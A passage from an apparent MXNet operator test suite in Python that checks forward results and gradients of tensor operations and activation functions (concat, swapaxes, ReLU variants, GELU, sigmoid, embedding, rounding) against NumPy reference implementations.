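    # Shift by the per-axis max before exponentiating for numerical stability;
    # this leaves the softmax value unchanged.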
x = x - np.max(x, axis=axis, keepdims=True)
x = np.exp(x/temperature)
x /= np.sum(x, axis=axis, keepdims=True)
return x
def check_elementwise_sum_with_shape(shape, n):
# forward
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.ElementWiseSum(*inputs, name='esum')
arr = [mx.nd.empty(shape) for i in range(n)]
arr_grad = [mx.nd.empty(shape) for i in range(n)]
for i in range(n):
arr[i][:] = np.random.uniform(-10, 10, shape)
exec1 = out._bind(default_context(),
args=arr,
args_grad=arr_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
out = sum(a.asnumpy() for a in arr)
assert_almost_equal(out, out1, rtol=1e-5, atol=1e-5)
out_grad = mx.nd.empty(shape)
out_grad[:] = np.random.uniform(-10, 10, shape)
# backward
exec1.backward([out_grad])
for a in arr_grad:
assert_almost_equal(a, out_grad, rtol=1e-5, atol=1e-5)
@pytest.mark.serial
def test_elementwise_sum():
nrepeat = 2
maxdim = 4
for repeat in range(nrepeat):
for dim in range(1, maxdim):
shape = tuple(np.random.randint(1, int(1000**(1.0/dim)), size=dim))
check_elementwise_sum_with_shape(shape, np.random.randint(1, 8))
def check_concat_with_shape(shapes, dimension, skip_second):
# if skip_second is True, second argument will not have gradient.
# it is to test #1130
n = len(shapes)
# forward
target_dim = 0
for shape in shapes:
target_dim += shape[dimension]
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.Concat(*inputs, name='conc',dim=dimension)
arr = [mx.nd.empty(shape) for shape in shapes]
for i in range(n):
arr[i][:] = shapes[i][dimension]
arr_np = [np.copy(narray.asnumpy()) for narray in arr]
arr_grad = [mx.nd.empty(shape) for shape in shapes]
dict_grad = {}
arg_names = out.list_arguments()
for name, g in zip(arg_names, arr_grad):
if not skip_second or name != 'arg1':
dict_grad[name] = g
args = out.list_arguments()
arg_shapes, out_shapes, aux_shapes = out.infer_shape(**dict(zip(args, shapes)))
out_grad = mx.nd.empty(out_shapes[0])
exec1 = out._bind(default_context(),
args=arr,
args_grad=dict_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
ret = np.concatenate([narray.asnumpy() for narray in arr], axis=dimension)
assert_almost_equal(out1, ret)
# backward
out1.copyto(out_grad)
out_grad[:] += 1
exec1.backward([out_grad])
for i, name in enumerate(arg_names):
if not skip_second or name != 'arg1':
grad = dict_grad[name]
np_grad = arr_np[i]
assert_almost_equal(grad, np_grad + 1)
def test_concat():
for dimension in range(4):
n = 2
merge = [2, 3, 4, 5, 6]
a = 2
b = 3
c = 4
# test 2D
if dimension<2:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a))
elif dimension == 1:
shapes.append((a, merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 2, True)
check_concat_with_shape(shapes, dimension - 2, False)
#test 3D
if dimension<3:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a,b))
elif dimension ==1:
shapes.append((a,merge[i],b))
elif dimension ==2:
shapes.append((a,b,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 3, True)
check_concat_with_shape(shapes, dimension - 3, False)
# test 4D
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i],a,b,c))
elif dimension == 1:
shapes.append((a,merge[i],b,c))
elif dimension ==2:
shapes.append((a,b,merge[i],c))
elif dimension ==3:
shapes.append((a,b,c,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 4, True)
check_concat_with_shape(shapes, dimension - 4, False)
def test_slice_channel():
def check_slice_channel(data_ndim, axis, num_outputs, squeeze_axis):
ins = []
if squeeze_axis:
shape = np.random.randint(2, 5, data_ndim).tolist()
shape[axis] = num_outputs
out_ele_shape = [ele for ele in shape]
del out_ele_shape[axis]
else:
shape = np.random.randint(1, 5, data_ndim).tolist()
shape[axis] *= num_outputs
out_ele_shape = [ele for ele in shape]
out_ele_shape[axis] //= num_outputs
data_npy = np.random.normal(size=shape)
out_grads_npy = [np.random.normal(size=out_ele_shape) for i in range(num_outputs)]
data = mx.sym.Variable('data')
sym = mx.sym.SliceChannel(data=data, num_outputs=num_outputs, axis=axis, squeeze_axis=squeeze_axis)
exe = sym._simple_bind(ctx=default_context(), data=data_npy.shape)
outputs = exe.forward(is_train=True, data=data_npy)
assert len(exe.outputs) == num_outputs
for i in range(num_outputs):
            gt = data_npy.take(np.arange(i * shape[axis]/num_outputs,
                                         (i+1) * shape[axis]/num_outputs).astype(int), axis=axis)
if squeeze_axis:
assert_almost_equal(outputs[i], gt.reshape(outputs[i].shape))
else:
assert_almost_equal(outputs[i], gt)
# test backward
ograd = [mx.nd.array(ele, dtype=outputs[i].dtype) for i, ele in enumerate(out_grads_npy)]
exe.backward(out_grads=ograd)
if squeeze_axis:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate([np.expand_dims(ele, axis=axis) for ele in out_grads_npy],
axis=axis))
else:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate(out_grads_npy, axis=axis))
check_slice_channel(data_ndim=2, axis=1, num_outputs=3, squeeze_axis=True)
check_slice_channel(data_ndim=4, axis=2, num_outputs=3, squeeze_axis=False)
check_slice_channel(data_ndim=3, axis=-1, num_outputs=2, squeeze_axis=False)
check_slice_channel(data_ndim=5, axis=-2, num_outputs=3, squeeze_axis=True)
def test_python_op():
X = mx.symbol.Variable('X')
op = mx.operator.NumpyOp()
s = op.get_symbol(X, name='numpy_op')
x = mx.ndarray.ones((10))*10
dx = mx.ndarray.zeros((10))
dy = mx.ndarray.ones((10))
exec1 = s._bind(default_context(), args=[x], args_grad = {'X': dx})
exec1.forward(is_train=True)
assert_almost_equal(x, exec1.outputs[0])
exec1.backward(dy)
assert_almost_equal(dy, dx)
def test_swapaxes():
data = mx.symbol.Variable('data')
shape = (2, 3, 4)
data_tmp = np.ones(shape)
data_tmp[0] = 1
data_tmp[1] = 2
arr_data = mx.nd.array(data_tmp)
swap0 = mx.symbol.SwapAxis(data=data, dim1=0, dim2=2)
swap = mx.symbol.SwapAxis(data=swap0, dim1=1, dim2=2)
exe_c = swap._bind(default_context(), args=[arr_data])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
swap0_ = np.swapaxes(data_tmp, 0, 2)
swap_ = np.swapaxes(swap0_, 1, 2)
assert_almost_equal(out, swap_)
config = [((1, 1, 2), 0, 1),
((1, 1, 2), -1, -2),
((4, 5, 6, 7), 1, 1),
((4, 5, 6, 7), 2, 3),
((4, 5, 6, 7), -2, 2),
((4, 5, 6, 7), -2, -3)]
for shape, axis1, axis2 in config:
data_np = np.random.uniform(size=shape)
data_mx = mx.nd.array(data_np, dtype=data_np.dtype)
ret_np = np.swapaxes(data_np, axis1=axis1, axis2=axis2)
ret_mx = mx.symbol.SwapAxis(data, dim1=axis1, dim2=axis2)
exe_c = ret_mx._bind(default_context(), args=[data_mx])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
assert_almost_equal(out, ret_np)
@xfail_when_nonstandard_decimal_separator
def test_scalarop():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)*5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = 2 / (4-((1+data+1)*2/5)-0.8-(data!=0))
npout_1 = (4-((1+data_tmp+1)*2/5)-0.8-(data_tmp!=0))
npout = 2/npout_1
check_symbolic_forward(test, [data_tmp], [npout])
npout_grad = 2.*2/5
npout_grad = 2*npout_grad /(npout_1 *npout_1 )
check_symbolic_backward(test, [data_tmp], [np.ones(shape)*2], [npout_grad])
def test_scalar_pow():
data = mx.symbol.Variable('data')
shape = (1, 1)
data_tmp = np.ones(shape)
test = data ** 2
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [data_tmp ** 2])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)], [2 * data_tmp])
def test_symbol_pow():
shape = (1, 1)
data = mx.symbol.Variable('data')
data_tmp = np.ones(shape)*2
exp = mx.symbol.Variable('exp')
exp_tmp = np.ones(shape)*3
test = data**exp
check_numeric_gradient(test, [data_tmp, exp_tmp])
check_symbolic_forward(test, [data_tmp, exp_tmp], [data_tmp**exp_tmp])
data_dir = data_tmp**(exp_tmp - 1) * exp_tmp
exp_dir = data_tmp**(exp_tmp) * np.log(data_tmp)
check_symbolic_backward(test, [data_tmp, exp_tmp], [np.ones(shape)], [data_dir, exp_dir])
def test_fully_connected():
# Create data of given shape as a uniform distribution centered on 0.0
def random_data(shape, dtype=np.float32):
return mx.nd.random.uniform(low=-0.5,
high=0.5, shape=shape, dtype=dtype)
data = mx.sym.var("data")
fc_weight = mx.sym.var("weight")
fc_bias = mx.sym.var("bias")
fc = mx.sym.FullyConnected(data=data, weight=fc_weight, bias=fc_bias, num_hidden=10, no_bias=False, name='fc')
data = random_data(shape=(5, 5, 5, 13))
fc_weight = random_data(shape=(10, 325))
fc_bias = random_data(shape=(10))
fc_bias2 = random_data(shape=(10, 1))
data_np = data.asnumpy().reshape(5, 325)
fc_weight_np = np.transpose(fc_weight.asnumpy())
fc_bias_np = fc_bias.asnumpy()
res = np.dot(data_np, fc_weight_np) + fc_bias.asnumpy()
check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np}, {'fc_output': res})
check_numeric_gradient(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np})
# TODO: Fix Bug #15032 when bias has ndim > 1
#check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias2.asnumpy()}, {'fc_output': res})
def test_pow_fn():
shape = (3, 4)
exp = mx.symbol.Variable("exp")
x = np.ones(shape)*3
for y in [mx.sym.pow(2, exp), mx.sym.power(2, exp)]:
check_numeric_gradient(y, [x], numeric_eps=1E-3)
check_symbolic_forward(y, [x], [2**x])
check_symbolic_backward(y, [x], [np.ones(shape)], [np.log(2) * 2**x])
def test_relu():
def frelu(x):
return np.maximum(x, 0.0)
def frelu_grad(x):
return np.float32(1.0) * (x > np.float32(0.0))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.relu(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype('float32')
eps = 1e-4
# Avoid finite difference method inaccuracies due to discontinuous gradient at the origin.
# Here we replace small problematic inputs with 1.0. Repro issue with seed 97264195.
xa[abs(xa) < eps] = 1.0
ya = frelu(xa)
ga = frelu_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=eps)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga])
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues;
# the analytical checks are still performed on each and every data type to verify correctness.
def test_leaky_relu():
def fleaky_relu(x, act_type, slope=0.25):
neg_indices = x < 0
out = x.copy()
if act_type == 'elu':
out[neg_indices] = slope * np.expm1(out[neg_indices])
elif act_type == 'leaky':
out[neg_indices] = slope * out[neg_indices]
return out
def fleaky_relu_grad(grad, x, y, act_type, slope=0.25):
neg_indices = x < 0
out = np.ones(x.shape)
if act_type == 'elu':
out[neg_indices] = y[neg_indices] + slope
elif act_type == 'leaky':
out[neg_indices] = slope
return out * grad
for ndim in range(1, 4):
shape = rand_shape_nd(ndim)
x = mx.symbol.Variable("x")
slp = 0.25
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
eps = 1e-4
rtol = 1e-2
atol = 1e-3
xa[abs(xa) < eps] = 1.0
for act_type in ['elu', 'leaky']:
y = mx.symbol.LeakyReLU(data=x, slope=slp, act_type=act_type)
ya = fleaky_relu(xa, slope=slp, act_type=act_type)
ga = fleaky_relu_grad(np.ones(shape), xa, ya, slope=slp, act_type=act_type)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape, dtype=dtype)], [ga], rtol=rtol, atol=atol, dtype=dtype)
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues;
# the analytical checks are still performed on each and every data type to verify correctness.
def test_prelu():
def fprelu(x, gamma):
pos_indices = x > 0
out = x.copy()
if len(x.shape) == 4:
out = out.transpose(2,3,0,1)
out = np.multiply(out, gamma)
out = out.transpose(2,3,0,1)
else:
out = np.multiply(out, gamma)
out[pos_indices] = x[pos_indices]
return out
def fprelu_grad(x, y, gamma):
pos_indices = x > 0
if len(x.shape) == 4:
grad_x = np.multiply(np.ones(x.shape).transpose(2,3,0,1), gamma)
grad_x = grad_x.transpose(2,3,0,1)
else:
grad_x = np.multiply(np.ones(x.shape), gamma)
grad_gam = np.zeros(gamma.shape)
copy_x = x.copy()
copy_x[pos_indices] = 0.0
grad_x[pos_indices] = 1.0
if len(gamma.shape) > 1 and len(x.shape) != 4:
grad_gam = copy_x
elif len(gamma.shape) > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(2,3))
elif gamma.shape[0] == 1:
grad_gam = np.sum(np.sum(copy_x))
elif gamma.shape[0] > 1 and len(x.shape) != 4:
grad_gam = np.sum(copy_x, axis=0)
elif gamma.shape[0] > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(0,2,3))
return (grad_x, grad_gam)
x = mx.symbol.Variable("x")
gamma = mx.symbol.Variable("gamma")
for shape in [(3,4), (3,4,4,5)]:
for dtype in [np.float16, np.float32, np.float64]:
for gam in [np.array([0.1, 0.2, 0.3, 0.4], dtype=dtype)]:
gam_full = np.array([gam, gam, gam])
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
rtol = 1e-2
atol = 1e-3
eps = 1e-4
xa[abs(xa) < eps] = 1.0
y = mx.symbol.LeakyReLU(data=x, gamma=gamma, act_type='prelu')
ya = fprelu(xa, gam)
ya_full = fprelu(xa, gam_full)
g_xa, g_gam = fprelu_grad(xa, ya, gamma=gam)
g_xa_full, g_gam_full = fprelu_grad(xa, ya_full, gamma=gam_full)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa, gam], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_numeric_gradient(y, [xa, gam_full], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam], [np.ones(ya.shape, dtype=dtype)],
[g_xa, g_gam], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam_full], [ya_full], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam_full], [np.ones(ya_full.shape, dtype=dtype)],
[g_xa_full, g_gam_full], rtol=rtol, atol=atol, dtype=dtype)
def test_selu():
alpha = 1.6732632423543772848170429916717
lamb = 1.0507009873554804934193349852946
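    # Standard SELU constants (alpha, lambda) from Klambauer et al., "Self-Normalizing Neural Networks".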
def fselu(x):
neg_indices = x < 0
out = x.copy()
out[neg_indices] = alpha * np.expm1(out[neg_indices])
return out * lamb
def fselu_grad(grad, x, y):
neg_indices = x < 0
out = np.ones(x.shape).astype(x.dtype)
out[neg_indices] = y[neg_indices] + alpha
return out * lamb
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="selu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 1e-1, 1e-2) if dtype is np.float16 else (1e-4, 1e-2, 1e-4)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fselu(xa)
ga = fselu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape, dtype=dtype)], [ga], rtol=rtol, atol=atol, dtype=dtype)
def test_gelu():
CUBE_CONSTANT = 0.044715
ROOT_TWO_OVER_PI = 0.7978845608028654
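    # Constants for the tanh approximation of GELU:
    # gelu(x) ~= 0.5 * x * (1 + tanh(sqrt(2/pi) * (x + 0.044715 * x**3))).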
def g(x):
return ROOT_TWO_OVER_PI * (x + CUBE_CONSTANT * np.power(x, 3))
def g_grad(x):
return ROOT_TWO_OVER_PI * (1.0 + 3.0 * CUBE_CONSTANT * np.power(x, 2))
def f(x):
return 1.0 + np.tanh(g(x))
def f_grad(x):
return (1.0 - np.tanh(g(x)) * np.tanh(g(x))) * g_grad(x)
def fgelu(x):
return 0.5 * x * f(x)
def fgelu_grad(grad, x, y):
return grad * (y / x + y * (1 - np.tanh(g(x))) * g_grad(x))
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="gelu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 2e-2, 1e-3) if dtype is np.float16 else (1e-4, 1e-3, 1e-5)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fgelu(xa)
ga = fgelu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
def test_sigmoid():
def fsigmoid(a):
return np.divide(1.0, (1.0 + np.exp(-a)))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.sigmoid(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsigmoid(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya * (1 - ya)])
def test_log_sigmoid():
def flog_sigmoid(a):
return np.log(np.divide(1.0, np.add(1.0, np.exp(-a))))
def flog_sigmoid_grad(a):
return np.divide(1.0, np.add(1.0, np.exp(a)))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.log_sigmoid(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = flog_sigmoid(xa)
ya_grad = flog_sigmoid_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya_grad])
def test_mish():
def fmish(a):
return a * np.tanh(np.log1p(np.exp(a)))
def fmish_grad(a):
softrelu = np.log1p(np.exp(a))
tanh = np.tanh(softrelu)
sigmoid = np.divide(1.0, (1.0 + np.exp(-a)))
return tanh + a * sigmoid * (1.0 - tanh * tanh)
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.mish(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fmish(xa)
ya_grad = fmish_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya_grad])
def test_shape_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.shape_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.shape(xa)
yg = mx.nd.ones(ya)
exe = y._bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
def test_size_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.size_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.size(xa)
yg = mx.nd.ones(ya)
exe = y._bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
def test_hard_sigmoid():
def fhardsigmoid(a, alpha=0.2, beta=0.5):
return np.maximum(np.zeros(a.shape, dtype=a.dtype),
np.minimum(np.ones(a.shape, dtype=a.dtype), alpha*a+beta))
def fhardsigmoid_grad(a, out_grad, alpha=0.2, beta=0.5):
orig_out = fhardsigmoid(a, alpha, beta)
res = out_grad * alpha
res[orig_out <= 0.0] = 0.0
res[orig_out >= 1.0] = 0.0
return res
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.hard_sigmoid(x)
for dtype in [np.float16, np.float32, np.float64]:
if dtype is np.float16:
rtol = 1e-2
else:
rtol = 1e-3
atol = 1e-3
eps = 1e-3
xa = np.random.uniform(low=-3.0,high=3.0,size=shape).astype(dtype)
# function not differentiable at x=2.5 and -2.5
xa[abs(xa-2.5) < eps] -= 2 * eps
xa[abs(xa+2.5) < eps] += 2 * eps
ya = fhardsigmoid(xa)
grad_xa = fhardsigmoid_grad(xa, np.ones(shape))
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [grad_xa], rtol=rtol, atol=atol, dtype=dtype)
def test_softsign():
def fsoftsign(a):
return np.divide(a, (1.0 + np.abs(a)))
def fsoftsign_grad(a):
return np.divide(1.0, np.square((1.0 + np.abs(a))))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.softsign(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsoftsign(xa)
ya_grad = fsoftsign_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya_grad])
def test_binary_logic():
def _inner_test(forward_gt, logic_sym, x_shape, y_shape, test_scalar=True):
x = mx.symbol.Variable("x")
y = mx.symbol.Variable("y")
z = logic_sym(x, y)
x_npy = np.random.randint(0, 4, size=x_shape).astype(np.float32)
y_npy = np.random.randint(0, 4, size=y_shape).astype(np.float32)
exe = z._simple_bind(ctx=default_context(), x=x_shape, y=y_shape)
mx_out = exe.forward(is_train=True, x=x_npy, y=y_npy)[0]
assert_almost_equal(mx_out, forward_gt(x_npy, y_npy))
exe.backward()
if test_scalar:
z_lscalar = logic_sym(1, y)
z_rscalar = logic_sym(x, 1)
exe_lscalar = z_lscalar._simple_bind(ctx=default_context(), y=y_shape)
exe_rscalar = z_rscalar._simple_bind(ctx=default_context(), x=x_shape)
mx_lscalar_out = exe_lscalar.forward(is_train=True, y=y_npy)[0]
mx_rscalar_out = exe_rscalar.forward(is_train=True, x=x_npy)[0]
assert_almost_equal(mx_lscalar_out, forward_gt(1, y_npy))
assert_almost_equal(mx_rscalar_out, forward_gt(x_npy, 1))
exe_lscalar.backward()
exe_rscalar.backward()
# Test the no-broadcasting binary logic ops + scalar logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: x == y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: x > y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: x >= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: x < y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: x <= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: x != y, x_shape=(10, 10), y_shape=(10, 10))
# Test the broadcasting binary logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: mx.sym.broadcast_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: mx.sym.broadcast_greater(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: mx.sym.broadcast_greater_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: mx.sym.broadcast_not_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
def test_unary_logic():
def reference(a, dtype):
return np.logical_not(a).astype(dtype)
shape = (3, 4)
xa = np.random.randint(-2, 2, size=shape).astype(np.float32)
mx_xa = mx.nd.array(xa)
mx_out = mx.nd.logical_not(mx_xa)
assert_almost_equal(mx_out, reference(xa, dtype=xa.dtype))
x = mx.sym.Variable('x')
y = mx.sym.logical_not(data=x)
exe = y._simple_bind(ctx=default_context(), x=shape)
sym_out = exe.forward(is_train=True, x=mx_xa)[0]
assert_almost_equal(sym_out, reference(xa, dtype=xa.dtype))
def test_embedding():
in_dim = 10
out_dim = 4
batch = 24
data = mx.sym.Variable("data")
embed = mx.sym.Embedding(data=data, input_dim=in_dim, output_dim=out_dim, name="embed")
exe_test = embed._simple_bind(default_context(), grad_req={'data': 'null', 'embed_weight': 'write'}, data=(batch,))
arg_map = dict(zip(embed.list_arguments(), exe_test.arg_arrays))
grad_map = dict(zip(embed.list_arguments(), exe_test.grad_arrays))
np_data = np.random.randint(low=0, high=in_dim, size=batch)
np_weight = np.random.uniform(-0.01, 0.01, arg_map["embed_weight"].shape)
np_onehot = np.zeros((batch, in_dim))
np_onehot[np.arange(batch), np_data] = 1.0
# forward
arg_map["data"][:] = np_data
arg_map["embed_weight"][:] = np_weight
exe_test.forward(is_train=True)
# Non-zero atol required, as exposed by seed 781663739
rtol = 1e-5
atol = 1e-5
assert_almost_equal(exe_test.outputs[0], np.dot(np_onehot, np_weight), rtol=rtol, atol=atol)
# backward
np_grad = np.random.uniform(-1, 1, exe_test.outputs[0].shape)
grad = mx.nd.zeros(np_grad.shape)
grad[:] = np_grad
exe_test.backward([grad])
assert_almost_equal(grad_map["embed_weight"], np.dot(np_onehot.T, np_grad), rtol=rtol, atol=atol)
# check ops handle duplicate input correctly.
def test_binary_op_duplicate_input():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = 5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
out_grad = mx.nd.empty(shape)
out_grad[:] = 1
square = data * data
exe_square = square._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_square.forward(is_train=True)
assert_almost_equal(exe_square.outputs[0], data_tmp * data_tmp)
exe_square.backward(out_grad)
assert_almost_equal(arr_grad, 2.0 * data_tmp)
def test_sign():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.sign(data)
exe_test = test._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.sign(data_tmp)
assert_almost_equal(out, npout)
    out_grad = mx.nd.empty(shape)
    out_grad[:] = 2
    npout_grad = out_grad.asnumpy()
    npout_grad = 0
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def test_round_ceil_floor():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5.543
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]= 2
test = mx.sym.round(data) + mx.sym.ceil(data) + mx.sym.floor(data)
exe_test = test._bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.round(data_tmp) + np.ceil(data_tmp) + np.floor(data_tmp)
assert_almost_equal(out, npout)
def test_trunc():
data_tmp = np.random.rand(3, 4) * 10 - 5
arr_data = mx.nd.array(data_tmp)
data = mx.symbol.Variable('data')
test = mx.sym.trunc(data)
exe_test = test._bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
# 'trunc' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
# Repro issue with seed 1660190454
npout = np.trunc(np.float32(data_tmp))
assert_almost_equal(out, npout)
def test_rsqrt_cos_sin():
data = mx.symbol.Variable('data')
